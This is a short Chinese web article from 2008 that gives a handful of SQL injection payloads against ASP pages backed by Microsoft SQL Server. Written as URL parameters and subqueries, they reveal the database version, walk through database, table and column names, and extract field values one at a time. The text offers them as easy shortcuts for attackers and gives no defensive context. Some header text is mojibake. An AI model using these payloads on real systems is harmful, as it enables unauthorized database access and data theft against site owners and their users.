WEB开发网      濠靛倻鏅悵顖涚附閽樺鐎诲ù婊庡亾缁辨帗鎷呴悩鍨暠濞戞挴鍋撳ù鐘烘閸ㄥ孩绂嶉锝喰﹂柟瀛樺灣濠婃垿鎯冮崟顏嗩伇濞寸姾妫勬慨鈺呭礉濞戝磭骞㈤悹鍥у槻閸ㄥ孩绂嶉敓锟� ---闁挎洩鎷�
开发学院网络安全黑客技术 注入的几条简单语句,不用像网上那样复杂 阅读

注入的几条简单语句,不用像网上那样复杂

 2008-10-27 16:51:22 来源:WEB开发网 闁靛棴鎷�闁告垵绻愰惃顒傗偓娑欍仦缂嶏拷濠⒀呭仜閵囧洨鈧稒銇炵紞锟�闁靛棴鎷�  闁稿繗娅曢弫鐐哄级閵婏缚鑸瀣仧濞堟垵顕ラ鐓庤Е
核心提示:一、版本url/1.asp?id=1 and @@VERSION>0二、跨库url/1.asp?id=1 and 1=(select db_name(n))n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?三、列名url/1.asp?id=1 and 1=(select co

一、版本

url/1.asp?id=1 and @@VERSION>0

二、跨库

url/1.asp?id=1 and 1=(select db_name(n))

n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?

三、列名

url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)

四、表名字段值

select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))

字段值:

select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)

n改1,2,3,4就可以得库名、列名

Tags:注入 简单 语句

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接